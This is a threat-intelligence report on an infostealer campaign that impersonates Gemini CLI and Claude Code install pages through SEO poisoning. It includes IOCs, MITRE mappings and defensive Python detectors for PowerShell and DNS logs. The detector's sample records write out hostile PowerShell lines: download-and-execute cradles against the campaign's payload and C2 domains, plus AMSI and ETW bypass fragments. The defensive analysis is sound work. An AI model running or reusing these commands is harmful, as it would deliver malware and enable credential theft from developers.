Full Report
Executive summary
Financially motivated eCrime actors will likely continue to expand opportunistic campaigns that impersonate AI platforms. These campaigns create direct supply chain risk for enterprises: threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations.

In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages. The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server. Beyond credential theft, the malware provides arbitrary remote code execution, which financially motivated operators use to transition into hands-on-keyboard intrusions against selected victims and run interactive code within the compromised environment. Installations from these impersonated websites result in the exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network.

This campaign shows that financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware. Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory.
Typosquatted domains impersonate Gemini and Claude Code installation
The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled the analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of the search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide, and is prompted to execute a single command to complete the install.
Analysis Summary
# Tool/Technique: AI-Platform Impersonation Infostealer Campaign
## Overview
This is a sophisticated, financially motivated eCrime campaign targeting software developers and enterprise environments. The attack leverages SEO poisoning to impersonate popular AI coding assistants (Gemini CLI and Claude Code). The primary purpose is to deploy a memory-resident PowerShell infostealer that harvests high-value credentials, specifically targeting developer and infrastructure-related data.
## Technical Details
- **Type:** Malware (Infostealer) / Technique (SEO Poisoning/Typosquatting)
- **Platform:** Windows
- **Capabilities:** Credential harvesting, arbitrary remote code execution (RCE), anti-forensics, and data exfiltration.
- **First Seen:** March 2026
## MITRE ATT&CK Mapping
- **[TA0042 - Resource Development]**
- [T1583.001 - Acquire Infrastructure: Domains]
- [T1608.006 - Stage Capabilities: SEO Poisoning]
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1204.004 - User Execution: Malicious Copy and Paste]
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information]
- [T1562.001 - Impair Defenses: Disable or Modify Tools]
- [T1497.001 - Virtualization/Sandbox Evasion: System Checks]
- **[TA0006 - Credential Access]**
- [T1555.003 - Credentials from Web Browsers]
- [T1539 - Steal Web Session Cookie]
- [T1552.001 - Unsecured Credentials: Credentials In Files]
- [T1552.004 - Unsecured Credentials: Private Keys]
- **[TA0007 - Discovery]**
- [T1057 - Process Discovery]
- **[TA0011 - Command and Control]**
- [T1071.001 - Application Layer Protocol: Web Protocols]
- **[TA0010 - Exfiltration]**
- [T1041 - Exfiltration Over C2 Channel]
## Functionality
### Core Capabilities
- **In-Memory Execution:** Operates entirely within PowerShell memory to minimize disk footprint.
- **Selective Data Harvesting:** Targets browser login data, session cookies (Slack, Teams, Discord), and cloud sync directories (Proton Drive, iCloud, OneDrive).
- **Developer-Specific Targeting:** Actively seeks out OAuth tokens, CI/CD credentials, OpenVPN configurations, and sensitive SSH keys (via PuTTY/WinSCP).
### Advanced Features
- **Anti-Analysis:** Includes approximately 6,800 lines of junk code to hinder analysis and specifically checks for `qemu-ga` to detect sandbox environments.
- **Subverting Security Controls:** Patches `amsi.dll` in memory to bypass the Antimalware Scan Interface and disables Event Tracing for Windows (ETW) to prevent logging.
- **Pivot Potential:** Provides RCE capabilities, allowing threat actors to transition from automated theft to "hands-on-keyboard" attacks.
## Indicators of Compromise
- **File Names:** `Install.ps1`
- **Network Indicators:**
- `geminicli[.]co[.]com` (Fake installation page)
- `gemini-setup[.]com` (Payload delivery)
- `claudecode[.]co[.]com` (Fake installation page)
- `claude-setup[.]com` (Payload delivery)
- `events[.]msft23[.]com` (C2 Server)
- `events[.]ms709[.]com` (C2 Server)
- **Behavioral Indicators:**
- PowerShell execution using the `irm | iex` (Invoke-RestMethod | Invoke-Expression) pattern.
- Hidden PowerShell windows launched via `Shell.Application.ShellExecute`.
- Process enumeration via the Restart Manager API (`rstrtmgr.dll`: `RmStartSession`, `RmRegisterResources`, `RmGetList`) instead of the standard `Get-Process`.
## Associated Threat Actors
- Unnamed financially motivated eCrime actors (Analysis suggests TTPs similar to those targeting developer supply chains).
## Detection Methods
- **Behavioral Detection:** Monitor for PowerShell processes disabling ETW (zeroing the private `m_enabled` field of the .NET ETW event provider) or patching `amsi.dll`. Both patches happen in memory, but the script that performs them is captured by script block logging (Event ID 4104) in deobfuscated form, so the function and field names it references are visible there; EDR memory-integrity telemetry covers the case where the script text itself has been obfuscated.
- **Network Monitoring:** Look for outbound connections to newly registered domains mimicking popular developer tools and AI platforms.
- **Process Monitoring:** Alert on Restart Manager use (`rstrtmgr.dll` loaded, `RmStartSession`/`RmGetList` called) from PowerShell or other non-installer processes; its legitimate callers are installers and servicing components working out which processes hold a file open, so a PowerShell host enumerating processes this way is rare.
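The behavioral indicators and detection methods above reduce to string patterns in script block text. The following is an added example (written for this page; it is neither EclecticIQ's code nor the malware's) that scores constructed Event ID 4104 `ScriptBlockText` records against those patterns and the report's IOC domains. The rule weights, the triage threshold and the sample records are assumptions made for the example.

```python
# Added example (the EclecticIQ report does not ship this code): score PowerShell
# Script Block Logging entries (Event ID 4104 ScriptBlockText) for the behaviors
# the report describes. The IOC domains are the report's; the log records are
# constructed for this example and the rule weights are an assumption.
import re
from dataclasses import dataclass, field

# Defanged in the report; normalized here for matching.
IOC_DOMAINS = {
    "geminicli.co.com", "gemini-setup.com",
    "claudecode.co.com", "claude-setup.com",
    "events.msft23.com", "events.ms709.com",
}

# (rule name, pattern, weight). Case-insensitive because PowerShell is.
RULES = [
    # irm/iwr/DownloadString output piped into iex: the install one-liner.
    ("download_cradle",
     re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
                r".*?\|\s*(iex|invoke-expression)\b", re.I | re.S), 4),
    # Shell.Application COM object used to launch a hidden window.
    ("hidden_shellexecute",
     re.compile(r"shell\.application.*?shellexecute", re.I | re.S), 3),
    # Strings that appear when amsi.dll is located and patched in memory.
    ("amsi_patch", re.compile(r"amsi\.dll|amsiscanbuffer", re.I), 5),
    # Strings that appear when the ETW provider is silenced.
    ("etw_patch", re.compile(r"etweventwrite|m_enabled", re.I), 5),
    # Restart Manager API used for process enumeration instead of Get-Process.
    ("restart_manager_enum",
     re.compile(r"rstrtmgr\.dll|rmstartsession|rmregisterresources|rmgetlist", re.I), 3),
    # Sandbox check for the QEMU guest agent.
    ("sandbox_check", re.compile(r"qemu-ga", re.I), 2),
]

HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


@dataclass
class Verdict:
    record_id: str
    score: int = 0
    hits: list = field(default_factory=list)
    domains: list = field(default_factory=list)


def analyze_script_block(record_id: str, text: str) -> Verdict:
    """Score one ScriptBlockText value against the rules and the IOC domains."""
    v = Verdict(record_id)
    for name, pattern, weight in RULES:
        if pattern.search(text):
            v.hits.append(name)
            v.score += weight
    for host in HOST_RE.findall(text):
        host = host.lower()
        if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
            v.domains.append(host)
            v.score += 5
    return v


def triage(records, threshold: int = 4):
    """Return verdicts at or above threshold, highest score first."""
    verdicts = [analyze_script_block(rid, text) for rid, text in records]
    return sorted((v for v in verdicts if v.score >= threshold),
                  key=lambda v: v.score, reverse=True)


# Constructed 4104 records (id, ScriptBlockText); not real telemetry.
SAMPLE_4104 = [
    ("sb-1", "irm https://gemini-setup.com/install.ps1 | iex"),
    ("sb-2", "Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name, Id"),
    ("sb-3", "Invoke-WebRequest https://www.example.com/report.csv -OutFile report.csv"),
    ("sb-4", '$h = [Win32]::LoadLibrary("amsi.dll"); $p = [Win32]::GetProcAddress($h, "AmsiScanBuffer"); '
             '$f = $t.GetField("m_enabled", "NonPublic,Instance")'),
    ("sb-5", '(New-Object -ComObject Shell.Application).ShellExecute("powershell.exe", '
             '"-w hidden -ep bypass -c irm https://events.msft23.com/s | iex", "", "open", 0)'),
    ("sb-6", "if (Get-Process -Name qemu-ga -ErrorAction SilentlyContinue) { exit }"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_4104):
        print(f"{v.record_id}: score={v.score} hits={v.hits} domains={v.domains}")
```

The download cradle and the IOC domains are the cheap, high-confidence signals; the `amsi.dll` and `m_enabled` strings only help while the operator leaves them readable, which is why the sandbox check and Restart Manager rules carry weight of their own and why the threshold, not any single rule, decides what an analyst sees.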
## Mitigation Strategies
- **User Education:** Train developers to verify official URLs for CLI tools (e.g., Google or Anthropic official documentation) and avoid running "one-liner" install scripts from unverified sources.
- **Endpoint Hardening:** Enforce PowerShell Constrained Language Mode and enable script block logging (Event ID 4104) to gain visibility into in-memory execution. Constrained Language Mode blocks `Add-Type`, P/Invoke and COM object creation, which removes the primitives the AMSI patch and the `Shell.Application` hidden-window launch rely on, and script block logging records an `irm | iex` cradle even though nothing is written to disk.
- **Domain Filtering:** Use DNS filtering to block newly registered domains and known typosquatted infrastructure.
- **Credential Protection:** Implement hardware security keys (FIDO2) so that stolen passwords cannot be replayed. FIDO2 does not protect session cookies and OAuth tokens that have already been issued, which is what this infostealer takes; for those, shorten token lifetimes, revoke sessions and rotate CI/CD and VPN secrets as soon as a developer workstation is suspected of running one of these installers.
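For the network-monitoring and domain-filtering points above (lookalike domains, and the page, payload and C2 sequence that a single workstation produces), this added example (not from the report) scans a constructed resolver log for hostnames that borrow a brand token such as `gemini`, `claude` or `msft` outside an assumed vendor allowlist, and lists clients that hit more than one such domain within a short window. The allowlist, the suffix table and the log lines are assumptions made for the example.

```python
# Added example (not from the EclecticIQ report): flag DNS queries for lookalike
# domains that borrow a brand token from an AI tool or vendor but sit outside
# that vendor's registrable domains, and surface clients that hit several such
# domains in a short window, which matches the report's page -> payload -> C2
# sequence. The allowlist, the suffix table and the log are assumptions
# constructed for this example; use a public-suffix library in production.
from collections import defaultdict
from datetime import datetime, timedelta

# Brand token -> registrable domains where it legitimately appears (assumed).
BRANDS = {
    "gemini": {"google.com", "github.com", "npmjs.com"},
    "claude": {"anthropic.com", "claude.ai", "claude.com", "github.com", "npmjs.com"},
    # events.msft23[.]com imitates Microsoft telemetry naming; Microsoft's own
    # msft* domains must be allowlisted or they become false positives.
    "msft": {"microsoft.com", "msftconnecttest.com", "msftncsi.com"},
}

# Two-label suffixes under which the third label is the registrable name.
# co.com is included because the campaign's fake pages live under it.
TWO_LABEL_SUFFIXES = {"co.com", "co.uk", "com.au"}


def registrable_domain(host: str) -> str:
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def lookalike_reason(host: str):
    """Return (brand, registrable_domain) if host misuses a brand token, else None."""
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    for brand, allowed in BRANDS.items():
        if brand in host and reg not in allowed:
            return brand, reg
    return None


def scan_dns_log(text: str):
    """Parse '<iso-ts> <client> <qtype> <qname>' lines and return lookalike hits."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, _qtype, qname = parts
        why = lookalike_reason(qname)
        if why:
            hits.append({
                "ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                "client": client, "qname": qname.lower(),
                "brand": why[0], "registrable": why[1],
            })
    return hits


def clients_with_chain(hits, window_s: int = 600):
    """Clients that queried two or more distinct lookalike domains within window_s."""
    by_client = defaultdict(list)
    for h in hits:
        by_client[h["client"]].append((h["ts"], h["registrable"]))
    flagged = []
    for client, events in by_client.items():
        events.sort()
        for i, (t0, d0) in enumerate(events):
            later = [d for t, d in events[i + 1:] if t - t0 <= timedelta(seconds=window_s)]
            if any(d != d0 for d in later):
                flagged.append(client)
                break
    return sorted(flagged)


# Constructed resolver log: not real telemetry.
DNS_LOG = """\
2026-03-05T09:12:44Z ws-dev-17 A geminicli.co.com
2026-03-05T09:12:51Z ws-dev-17 A gemini-setup.com
2026-03-05T09:12:53Z ws-dev-17 A registry.npmjs.com
2026-03-05T09:13:02Z ws-dev-17 A events.msft23.com
2026-03-05T09:13:40Z ws-dev-22 A docs.anthropic.com
2026-03-05T09:13:41Z ws-dev-22 A claude.ai
2026-03-05T09:14:05Z ws-dev-22 A gemini.google.com
"""

if __name__ == "__main__":
    found = scan_dns_log(DNS_LOG)
    for h in found:
        print(f"{h['client']} -> {h['qname']} (brand {h['brand']!r} outside {h['registrable']})")
    print("chains:", clients_with_chain(found))
```

The brand-token check is deliberately loose (it fires on `claude.evil-cdn.net` as well as `claudecode.co.com`), so the allowlist is what keeps it quiet; the chain check is what turns a single suspicious lookup into a workstation worth isolating, since one host resolving the fake page, the payload domain and the C2 within seconds is the infection sequence the report describes.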
## Related Tools/Techniques
- **RedLine/LummaC2:** While infrastructure was disrupted, this campaign continues the trend of enterprise-focused infostealers.
- **SEO Poisoning:** Common technique used to bypass traditional email-based phishing filters.